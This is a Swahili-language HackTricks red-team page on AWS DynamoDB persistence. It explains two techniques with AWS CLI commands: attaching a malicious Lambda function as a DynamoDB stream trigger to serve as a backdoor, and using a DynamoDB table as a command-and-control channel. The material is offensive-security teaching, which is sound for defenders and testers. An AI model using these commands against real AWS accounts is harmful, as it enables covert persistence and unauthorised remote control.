AWS - DynamoDB Udumu

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

DynamoDB

Kwa maelezo zaidi angalia:

AWS - DynamoDB Enum

DynamoDB Triggers with Lambda Backdoor

Kwa kutumia DynamoDB triggers, mshambuliaji anaweza kuunda backdoor ya siri kwa kuhusisha Lambda function yenye madhara na jedwali. Lambda function inaweza kuamshwa wakati kipengee kimeongezwa, kimebadilishwa, au kimefutwa, na hivyo kumwezesha mshambuliaji kutekeleza code yoyote ndani ya akaunti ya AWS.

# Create a malicious Lambda function
aws lambda create-function \
--function-name MaliciousFunction \
--runtime nodejs14.x \
--role <LAMBDA_ROLE_ARN> \
--handler index.handler \
--zip-file fileb://malicious_function.zip \
--region <region>

# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
--table-name TargetTable \
--region <region>

# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
--function-name MaliciousFunction \
--event-source <STREAM_ARN> \
--region <region>

Ili kudumisha uendelevu, mshambuliaji anaweza kuunda au kubadilisha vitu katika jedwali la DynamoDB, ambayo itachochea Lambda function hasidi. Hii inamruhusu mshambuliaji kutekeleza code ndani ya akaunti ya AWS bila kuingiliana moja kwa moja na Lambda function.

DynamoDB as a C2 Channel

Mshambuliaji anaweza kutumia jedwali la DynamoDB kama command and control (C2) channel kwa kuunda vitu vinavyobeba amri na kutumia instances zilizoathiriwa au Lambda functions kuvichukua na kutekeleza amri hizi.

# Create a DynamoDB table for C2
aws dynamodb create-table \
--table-name C2Table \
--attribute-definitions AttributeName=CommandId,AttributeType=S \
--key-schema AttributeName=CommandId,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--region <region>

# Insert a command into the table
aws dynamodb put-item \
--table-name C2Table \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region <region>

Instances zilizoathiriwa au Lambda functions zinaweza kuangalia mara kwa mara jedwali la C2 kwa amri mpya, kuzitekeleza, na kwa hiari kuripoti matokeo kwenye jedwali. Hii inamruhusu mshambuliaji kudumisha uendelevu na udhibiti juu ya rasilimali zilizoathiriwa.

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.